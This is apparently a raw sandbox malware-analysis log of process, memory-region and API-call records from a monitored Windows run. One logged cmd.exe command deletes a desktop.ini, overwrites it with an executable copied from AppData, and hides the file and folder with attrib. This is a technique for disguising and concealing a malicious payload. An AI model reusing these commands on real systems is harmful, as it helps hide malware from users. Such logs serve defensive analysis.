"attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 12700 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 12701 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 12702 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 12703 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 12704 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 12705 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 12706 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 12707 start_va = 0xf0000 end_va = 0x156fff entry_point = 0xf0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 12708 start_va = 0x1a0000 end_va = 0x29ffff entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 12709 start_va = 0x3c0000 end_va = 0x3cffff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 12710 start_va = 0x6e440000 end_va = 0x6e45cfff entry_point = 0x6e440000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 12711 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 12712 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 12713 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 12714 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 12715 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 12716 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 12717 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 12718 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 12719 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 12720 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 12721 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 12722 start_va = 0x2a0000 end_va = 0x367fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12723 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 12724 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 175 os_tid = 0xc08 Process: id = "119" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16640" os_pid = "0xa48" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "117" os_parent_pid = "0xa70" cmd_line = "attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 12735 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 12736 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 12737 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 12738 start_va = 0x70000 end_va = 0xaffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 12739 start_va = 0x990000 end_va = 0x996fff entry_point = 0x990000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 12740 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 12741 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 12742 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 12743 start_va = 0x7ffd4000 end_va = 0x7ffd4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 12744 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 12745 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 12746 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 12747 start_va = 0x110000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 12748 start_va = 0x210000 end_va = 0x276fff entry_point = 0x210000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 12749 start_va = 0x3e0000 end_va = 0x3effff entry_point = 0x0 region_type = private name = "private_0x00000000003e0000" filename = "" Region: id = 12750 start_va = 0x6e440000 end_va = 0x6e45cfff entry_point = 0x6e440000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 12751 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 12752 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 12753 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 12754 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 12755 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 12756 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 12757 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 12758 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 12759 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 12760 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 12761 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 12762 start_va = 0x280000 end_va = 0x347fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000280000" filename = "" Region: id = 12763 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 12764 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 176 os_tid = 0xbd8 Process: id = "120" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16640" os_pid = "0xbe0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "117" os_parent_pid = "0xa70" cmd_line = "attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 12765 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 12766 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 12767 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 12768 start_va = 0x1b0000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 12769 start_va = 0x530000 end_va = 0x536fff entry_point = 0x530000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 12770 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 12771 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 12772 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 12773 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 12774 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 12775 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 12776 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 12777 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 12778 start_va = 0x2e0000 end_va = 0x3dffff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 12779 start_va = 0x700000 end_va = 0x70ffff entry_point = 0x0 region_type = private name = "private_0x0000000000700000" filename = "" Region: id = 12780 start_va = 0x6e440000 end_va = 0x6e45cfff entry_point = 0x6e440000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 12781 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 12782 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 12783 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 12784 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 12785 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 12786 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 12787 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 12788 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 12789 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 12790 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 12791 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 12792 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 12793 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 12794 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 177 os_tid = 0xbc0 Process: id = "121" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16640" os_pid = "0xa44" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 12827 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 12828 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 12829 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 12830 start_va = 0x1f0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 12831 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 12832 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 12833 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 12834 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 12835 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 12836 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 12885 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 12886 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 12887 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 12888 start_va = 0xc0000 end_va = 0xcffff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 12889 start_va = 0x3b0000 end_va = 0x4affff entry_point = 0x0 region_type = private name = "private_0x00000000003b0000" filename = "" Region: id = 12890 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 12891 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 12892 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 12893 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 12894 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 12895 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 12896 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 12897 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 12898 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 12899 start_va = 0xd0000 end_va = 0x197fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 12900 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 12901 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 12902 start_va = 0x1a0000 end_va = 0x1a6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 12903 start_va = 0x1b0000 end_va = 0x1b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 12904 start_va = 0x1c0000 end_va = 0x1c0fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 12905 start_va = 0x1d0000 end_va = 0x1d0fff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 12906 start_va = 0x4b0000 end_va = 0x5b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004b0000" filename = "" Region: id = 12907 start_va = 0x5c0000 end_va = 0x11bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 12908 start_va = 0x11c0000 end_va = 0x1322fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011c0000" filename = "" Region: id = 12958 start_va = 0x1330000 end_va = 0x15fefff entry_point = 0x1330000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 180 os_tid = 0xa4c [0133.330] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2efd0c | out: lpSystemTimeAsFileTime=0x2efd0c*(dwLowDateTime=0x89683e60, dwHighDateTime=0x1d440a9)) [0133.330] GetCurrentProcessId () returned 0xa44 [0133.330] GetCurrentThreadId () returned 0xa4c [0133.330] GetTickCount () returned 0x2a5c0 [0133.330] QueryPerformanceCounter (in: lpPerformanceCount=0x2efd04 | out: lpPerformanceCount=0x2efd04*=19011991006) returned 1 [0133.331] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0133.331] __set_app_type (_Type=0x1) [0133.331] __p__fmode () returned 0x76b331f4 [0133.331] __p__commode () returned 0x76b331fc [0133.331] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0133.332] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0133.332] GetCurrentThreadId () returned 0xa4c [0133.332] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xa4c) returned 0x38 [0133.332] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0133.332] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0133.332] SetThreadUILanguage (LangId=0x0) returned 0x409 [0133.332] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0133.332] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2efc9c | out: phkResult=0x2efc9c*=0x0) returned 0x2 [0133.332] VirtualQuery (in: lpAddress=0x2efcd3, lpBuffer=0x2efc6c, dwLength=0x1c | out: lpBuffer=0x2efc6c*(BaseAddress=0x2ef000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0133.332] VirtualQuery (in: lpAddress=0x1f0000, lpBuffer=0x2efc6c, dwLength=0x1c | out: lpBuffer=0x2efc6c*(BaseAddress=0x1f0000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0133.332] VirtualQuery (in: lpAddress=0x1f1000, lpBuffer=0x2efc6c, dwLength=0x1c | out: lpBuffer=0x2efc6c*(BaseAddress=0x1f1000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0133.332] VirtualQuery (in: lpAddress=0x1f3000, lpBuffer=0x2efc6c, dwLength=0x1c | out: lpBuffer=0x2efc6c*(BaseAddress=0x1f3000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0133.332] VirtualQuery (in: lpAddress=0x2f0000, lpBuffer=0x2efc6c, dwLength=0x1c | out: lpBuffer=0x2efc6c*(BaseAddress=0x2f0000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0xc0000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0133.332] GetConsoleOutputCP () returned 0x1b5 [0133.332] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0133.332] 